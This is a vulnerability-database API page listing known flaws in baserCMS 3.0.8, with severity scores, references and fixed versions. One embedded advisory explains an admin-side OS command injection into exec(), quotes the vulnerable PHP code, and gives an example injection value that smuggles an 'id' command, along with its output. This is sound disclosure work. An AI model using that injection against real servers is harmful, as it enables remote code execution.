Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:composer/baserproject/basercms@3.0.8
Typecomposer
Namespacebaserproject
Namebasercms
Version3.0.8
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version5.2.3
Latest_non_vulnerable_version5.2.3
Affected_by_vulnerabilities
0
url VCID-1q79-sxzp-zker
vulnerability_id VCID-1q79-sxzp-zker
summary 
OS Command Injection
baserCMS allows a remote attacker with an administrative privilege to execute arbitrary OS commands via unspecified vectors.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-20682
reference_id
reference_type
scores
0
value 0.02357
scoring_system epss
scoring_elements 0.8521
published_at 2026-06-04T12:55:00Z
1
value 0.02357
scoring_system epss
scoring_elements 0.85235
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-20682
1
reference_url https://basercms.net/security/JVN64869876
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN64869876
2
reference_url https://jvn.jp/en/jp/JVN64869876/index.html
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://jvn.jp/en/jp/JVN64869876/index.html
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-20682
reference_id CVE-2021-20682
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-20682
fixed_packages
0
url pkg:composer/baserproject/basercms@4.4.5
purl pkg:composer/baserproject/basercms@4.4.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-5ay3-1t5g-vycu
3
vulnerability VCID-7x3n-4c2b-nfbx
4
vulnerability VCID-891u-x525-ykbb
5
vulnerability VCID-8buz-nsr9-3yge
6
vulnerability VCID-8ssu-umet-37bk
7
vulnerability VCID-ays7-6wvh-augt
8
vulnerability VCID-d1sf-cmct-zbh1
9
vulnerability VCID-g56w-z9cx-5ygv
10
vulnerability VCID-ggv8-3v9t-mfea
11
vulnerability VCID-hpk4-a6tr-3ffe
12
vulnerability VCID-j37y-gws9-ake9
13
vulnerability VCID-jby7-s5ez-dqb3
14
vulnerability VCID-k575-suuf-7bhf
15
vulnerability VCID-k5qv-4yp3-zbgf
16
vulnerability VCID-khft-xvrw-g3dr
17
vulnerability VCID-kmpp-6j49-pqfz
18
vulnerability VCID-mfm9-gsh3-ubg8
19
vulnerability VCID-nxrf-64er-xbfx
20
vulnerability VCID-p695-t9ye-v3ga
21
vulnerability VCID-pd8c-9d7z-zkhg
22
vulnerability VCID-sqr4-v889-tff8
23
vulnerability VCID-u16w-rbuk-ybfs
24
vulnerability VCID-uedz-j2vn-cbea
25
vulnerability VCID-y2sz-c6vb-pkdp
26
vulnerability VCID-zqd4-rdem-jfgk
27
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.5
aliases CVE-2021-20682, GHSA-g39q-f4rm-85x4
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1q79-sxzp-zker
1
url VCID-2u6y-aj6t-7fb1
vulnerability_id VCID-2u6y-aj6t-7fb1
summary 
Improper Privilege Management
baserCMS allows remote attackers to bypass access restriction for a content to view a file which is uploaded by a site user via unspecified vectors.
references
0
reference_url http://jvn.jp/en/jp/JVN67881316/index.html
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN67881316/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-0573
reference_id
reference_type
scores
0
value 0.00173
scoring_system epss
scoring_elements 0.38572
published_at 2026-06-05T12:55:00Z
1
value 0.00173
scoring_system epss
scoring_elements 0.38483
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-0573
2
reference_url https://basercms.net/security/JVN67881316
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN67881316
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-0573
reference_id CVE-2018-0573
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-0573
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.16
purl pkg:composer/baserproject/basercms@3.0.16
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-u16w-rbuk-ybfs
30
vulnerability VCID-uedz-j2vn-cbea
31
vulnerability VCID-vqx2-hzju-r7et
32
vulnerability VCID-xpsb-2yux-g3cf
33
vulnerability VCID-y2sz-c6vb-pkdp
34
vulnerability VCID-zqd4-rdem-jfgk
35
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.16
1
url pkg:composer/baserproject/basercms@4.1.1
purl pkg:composer/baserproject/basercms@4.1.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-twf5-bzba-gqb4
30
vulnerability VCID-u16w-rbuk-ybfs
31
vulnerability VCID-uedz-j2vn-cbea
32
vulnerability VCID-vqx2-hzju-r7et
33
vulnerability VCID-wvnk-63hy-ykeq
34
vulnerability VCID-xpsb-2yux-g3cf
35
vulnerability VCID-xxud-7jsh-bbc1
36
vulnerability VCID-y2sz-c6vb-pkdp
37
vulnerability VCID-zqd4-rdem-jfgk
38
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.1.1
aliases CVE-2018-0573, GHSA-33fq-qm4m-cjw3
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-2u6y-aj6t-7fb1
2
url VCID-3new-f12y-8bf9
vulnerability_id VCID-3new-f12y-8bf9
summary 
baserCMS has Unsafe File Upload Leading to Remote Code Execution (RCE)
### Details
The application's restore function allows users to upload a `.zip` file, which is then automatically extracted. A PHP file inside the archive is included using `require_once` without validating or restricting the filename. An attacker can craft a malicious PHP file within the zip and achieve arbitrary code execution when it is included.

Vector: Malicious ZIP upload + insecure `require_once`

### PoC
1. Restore backup
   ![image](https://github.com/user-attachments/assets/9e59768a-4a8e-472d-aaef-5d54546080f6)
1. Load file shell (insecure `require_once`)
   ![image](https://github.com/user-attachments/assets/8f7919a2-c7f3-4ae1-af6c-1b0057e4ba22)
   ![image](https://github.com/user-attachments/assets/c10ef049-459d-429e-a608-8fb220c3387f)

### Impact
Remote Code Execution (RCE)
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-32957
reference_id
reference_type
scores
0
value 0.00031
scoring_system epss
scoring_elements 0.09459
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-32957
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-32957
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-32957
6
reference_url https://github.com/advisories/GHSA-hv78-cwp4-8r7r
reference_id GHSA-hv78-cwp4-8r7r
reference_type
scores
url https://github.com/advisories/GHSA-hv78-cwp4-8r7r
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2025-32957, GHSA-hv78-cwp4-8r7r
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3new-f12y-8bf9
3
url VCID-4zw8-truk-pugf
vulnerability_id VCID-4zw8-truk-pugf
summary 
baserCMS has OS Command Injection Leading to Remote Code Execution (RCE)
## Summary

In the core update functionality of baserCMS, some parameters sent from the admin panel are passed to the `exec()` function without proper validation or escaping. This issue allows **an authenticated CMS administrator to execute arbitrary OS commands on the server (Remote Code Execution, RCE)**.

This vulnerability is not a UI-level issue such as screen manipulation or lack of CSRF protection, but rather stems from **a design that directly executes input values received on the server side as OS commands**. Therefore, even if buttons are hidden in the UI, or even if CakePHP's CSRF/FormProtection (SecurityComponent) ensures that only legitimate POST requests are accepted, **an attack is possible as long as a request containing a valid token is processed within an administrator session**.

---

## Vulnerability Information

| Item | Details |
| ---- | ------- |
| CWE | CWE-78: Improper Neutralization of Special Elements used in an OS Command |
| Impact | Remote Code Execution (RCE) |
| Severity | Critical |
| Attack Requirements | Administrator privileges required |
| Reproducibility | Reproducible (confirmed multiple times) |
| Test Environment | baserCMS 5.2.2 (Docker / development environment) |

---

## Affected Areas

- **Controller**
  - `PluginsController::get_core_update()`
- **Service**
  - `PluginsService::getCoreUpdate()`
- **Affected Endpoint**
  - `/baser/admin/baser-core/plugins/get_core_update`

---

## Technical Details

### Vulnerable Code Flow

```text
PluginsController::get_core_update()
  ↓ Retrieves php parameter from POST data
PluginsService::getCoreUpdate($targetVersion, $php, $force)
  ↓ Concatenates $php into command string without validation or escaping
exec($command)
```

### Relevant Code (Excerpt)

**PluginsController.php**

```php
$service->getCoreUpdate(
    $request->getData('targetVersion') ?? '',
    $request->getData('php') ?? 'php',
    $request->getData('force'),
);
```

**PluginsService.php**

```php
$command = $php . ' ' . ROOT . DS . 'bin' . DS . 'cake.php composer ' .
           $targetVersion . ' --php ' . $php . ' --dir ' . TMP . 'update';

exec($command, $out, $code);
```

The `$php` parameter is user input, and **none** of the following countermeasures are in place:

- Restriction via allowlist
- Validation via regular expression
- Escaping via `escapeshellarg()` or similar

---

## Attack Scenario

1. The attacker logs in as a CMS administrator
2. Sends a POST request to the core update functionality in the admin panel
3. Specifies a string containing OS commands in the `php` parameter
4. `exec()` is executed on the server side, running the arbitrary OS command

### Example Attack Input (Conceptual)

```text
php=php;id>/tmp/rce_test;#
```

---

## Verification Results (PoC)

### Execution Result

```bash
$ docker exec bc-php cat /tmp/rce_test
uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)
```

The above confirms that OS commands can be executed with `www-data` privileges.

### Additional Notes

- Reproducible through the legitimate flow in the admin panel (browser)
- Succeeds even with CSRF/FormProtection tokens included in a legitimate request
- Failure cases (400/403) have also been investigated and differentiated
- Confirmed reproducible via resending HTTP requests with tools such as curl (resending the same request containing valid tokens)

---

## Impact

If this vulnerability is exploited, the following becomes possible:

- Retrieval of server information
- Reading/writing arbitrary files
- Retrieval of application configuration information (DB credentials, etc.)
- OS-level operations beyond application permission boundaries

Although administrator privileges are required, **this is a design issue where the impact extends from the application layer to the OS layer**, and the impact is considered significant.

---

## Recommended Fix

### Primary Recommendation

- Do not accept the PHP executable path from user input
- Fix the PHP executable on the server side using the `PHP_BINARY` constant

```php
$php = escapeshellarg(PHP_BINARY);
```

### Supplementary Fix Recommendations

- Apply `escapeshellarg()` escaping to other command-line arguments (version number, directory, etc.) as well
- If possible, consider using execution methods that do not involve shell interpretation (array format, Process class, etc.)

### Alternative (Not Recommended)

- Allowlist validation for the PHP executable path
- Combined use of regex validation and `escapeshellarg()`

However, **from the perspective of reducing the attack surface, a design that eliminates user input entirely is recommended**.

---

## Additional Notes

- This issue is independent of UI display controls (showing/hiding buttons)
- As long as the endpoint exists, an attack is possible if a request containing valid tokens is processed
- This is a problem stemming from the design-level handling of input, and cannot be prevented by CSRF or UI controls alone

---

## Conclusion

Due to a design issue in baserCMS's core update functionality where user input is passed to `exec()` without validation, **Remote Code Execution (RCE) is achievable with administrator privileges**. This vulnerability can be fixed through input validation and design review, and prompt remediation is recommended.

This advisory was translated from Japanese to English using GitHub Copilot.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-21861
reference_id
reference_type
scores
0
value 0.00131
scoring_system epss
scoring_elements 0.32198
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-21861
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-21861
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-21861
6
reference_url https://github.com/advisories/GHSA-qxmc-6f24-g86g
reference_id GHSA-qxmc-6f24-g86g
reference_type
scores
url https://github.com/advisories/GHSA-qxmc-6f24-g86g
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-21861, GHSA-qxmc-6f24-g86g
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4zw8-truk-pugf
4
url VCID-5ay3-1t5g-vycu
vulnerability_id VCID-5ay3-1t5g-vycu
summary 
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
BaserCMS is an open source content management system with a focus on Japanese language support. Users with upload privilege may upload crafted zip files capable of path traversal on the host operating system. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-41279
reference_id
reference_type
scores
0
value 0.00438
scoring_system epss
scoring_elements 0.6349
published_at 2026-06-05T12:55:00Z
1
value 0.00438
scoring_system epss
scoring_elements 0.63447
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-41279
1
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
2
reference_url https://github.com/baserproject/basercms/commit/d8ab0a81a7bce35cc95ff7dff851a7e87a084336
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/d8ab0a81a7bce35cc95ff7dff851a7e87a084336
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-41279
reference_id CVE-2021-41279
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-41279
4
reference_url https://github.com/advisories/GHSA-4x2f-54wr-4hjg
reference_id GHSA-4x2f-54wr-4hjg
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4x2f-54wr-4hjg
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-4x2f-54wr-4hjg
reference_id GHSA-4x2f-54wr-4hjg
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/security/advisories/GHSA-4x2f-54wr-4hjg
fixed_packages
0
url pkg:composer/baserproject/basercms@4.5.4
purl pkg:composer/baserproject/basercms@4.5.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-ays7-6wvh-augt
6
vulnerability VCID-d1sf-cmct-zbh1
7
vulnerability VCID-g56w-z9cx-5ygv
8
vulnerability VCID-ggv8-3v9t-mfea
9
vulnerability VCID-j37y-gws9-ake9
10
vulnerability VCID-jby7-s5ez-dqb3
11
vulnerability VCID-k575-suuf-7bhf
12
vulnerability VCID-k5qv-4yp3-zbgf
13
vulnerability VCID-khft-xvrw-g3dr
14
vulnerability VCID-kmpp-6j49-pqfz
15
vulnerability VCID-mfm9-gsh3-ubg8
16
vulnerability VCID-nxrf-64er-xbfx
17
vulnerability VCID-p695-t9ye-v3ga
18
vulnerability VCID-pd8c-9d7z-zkhg
19
vulnerability VCID-sqr4-v889-tff8
20
vulnerability VCID-u16w-rbuk-ybfs
21
vulnerability VCID-uedz-j2vn-cbea
22
vulnerability VCID-y2sz-c6vb-pkdp
23
vulnerability VCID-zqd4-rdem-jfgk
24
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.4
aliases CVE-2021-41279, GHSA-4x2f-54wr-4hjg
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5ay3-1t5g-vycu
5
url VCID-6trr-5deb-yydm
vulnerability_id VCID-6trr-5deb-yydm
summary 
Unrestricted Upload of File with Dangerous Type
baserCMS allows remote attackers with a site operator privilege to upload arbitrary files.
references
0
reference_url http://jvn.jp/en/jp/JVN67881316/index.html
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN67881316/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-0571
reference_id
reference_type
scores
0
value 0.00167
scoring_system epss
scoring_elements 0.37611
published_at 2026-06-05T12:55:00Z
1
value 0.00167
scoring_system epss
scoring_elements 0.37518
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-0571
2
reference_url https://basercms.net/security/JVN67881316
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN67881316
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-0571
reference_id CVE-2018-0571
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-0571
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.16
purl pkg:composer/baserproject/basercms@3.0.16
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-u16w-rbuk-ybfs
30
vulnerability VCID-uedz-j2vn-cbea
31
vulnerability VCID-vqx2-hzju-r7et
32
vulnerability VCID-xpsb-2yux-g3cf
33
vulnerability VCID-y2sz-c6vb-pkdp
34
vulnerability VCID-zqd4-rdem-jfgk
35
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.16
1
url pkg:composer/baserproject/basercms@4.1.1
purl pkg:composer/baserproject/basercms@4.1.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
